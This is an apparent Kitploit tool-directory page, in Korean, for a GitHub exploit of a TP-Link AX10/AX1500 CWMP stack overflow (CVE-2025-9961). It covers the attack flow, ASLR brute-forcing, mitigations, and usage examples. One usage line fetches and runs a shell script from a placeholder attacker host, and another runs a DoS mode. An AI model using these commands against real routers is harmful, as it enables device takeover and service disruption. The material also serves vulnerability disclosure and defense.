Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-9961 | Kitploit
도구/GitHubGitHub/yt2w/cve-2025-9961
Embedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationPenetration TestingHardware SecurityRemote Access ToolBinary Exploitation
GitHubyt2w/cve-2025-9961

CVE-2025-9961

저장소 보기
617개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-9961

TP-Link AX10/AX1500 CWMP 버퍼 오버플로 RCE

개요

CWMP(TR-069)의 스택 기반 버퍼 오버플로로 인해 원격 코드 실행이 가능합니다.

필드값
제품TP-Link AX10, AX1500
영향받는 버전AX10 < 1.2.1, AX1500 < 1.3.11
CVSS8.6 (높음)
유형스택 버퍼 오버플로
벡터CWMP/TR-069 (포트 7547)
영향원격 코드 실행

공격 흐름

root@kitploit:~
flowchart LR
    A[Attacker] --> B["Malicious ACS"]
    B --> C["SetParameterValues"]
    C --> D["Stack Overflow"]
    D --> E["Overwrite PC"]
    E --> F["ret2libc"]
    F --> G["system()"]
    G --> H["RCE"]

기술 세부 사항

이 취약점은 cwmp 프로세스가 SetParameterValues SOAP 요청을 처리할 때 발생합니다. 입력 값이 경계 검사 없이 버퍼 크기를 계산하는 데 사용됩니다.

익스플로잇:

  • ret2libc를 사용하여 system() 호출
  • 무차별 대입을 통한 ASLR 우회
  • 서비스 재시작으로 반복 시도 가능

사용법

root@kitploit:~
python exploit.py <target_ip> --check-only

python exploit.py 192.168.0.1 --dos

python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"

파라미터

요구 사항

없음 (표준 라이브러리 사용)

완화 조치

  • 패치된 펌웨어로 업데이트
  • TR-069/CWMP 비활성화
  • 포트 7547 접근 제한

고지 사항

승인된 보안 테스트에만 사용하십시오.

도구 다운로드
플래그설명기본값
-p, --portCWMP 포트7547
-c, --commandRCE용 명령없음
-t, --timeout소켓 타임아웃10
--dosDoS 모드 전용꺼짐
--check-only취약 여부 확인꺼짐